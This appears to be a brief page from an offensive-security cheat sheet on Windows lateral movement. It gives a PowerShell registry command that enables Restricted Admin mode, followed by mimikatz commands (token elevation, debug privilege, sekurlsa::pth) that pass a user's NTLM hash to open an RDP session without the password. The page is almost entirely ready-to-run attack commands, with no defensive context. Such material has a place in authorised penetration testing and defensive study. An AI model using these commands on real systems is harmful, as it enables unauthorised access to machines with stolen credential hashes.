Enable Restricted Admin using powershell and use mimikatz for RDP
To enable restrcitedadmin using powershell run the following command.
1
New-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Lsa' -Name 'DisableRestrictedAdmin' -Value 0 -PropertyType DWORD
Copied!
Now you can use mimikatz as follows to get RDP session
1
token::elevate
2
privilege::debug
3
sekurlsa::pth /user:<user name> /domain:<domain name> /ntlm:<the user's ntlm hash> /run:"mstsc.exe /restrictedadmin /v:<IP of the system>"
Copied!
Last modified 8mo ago
Copy link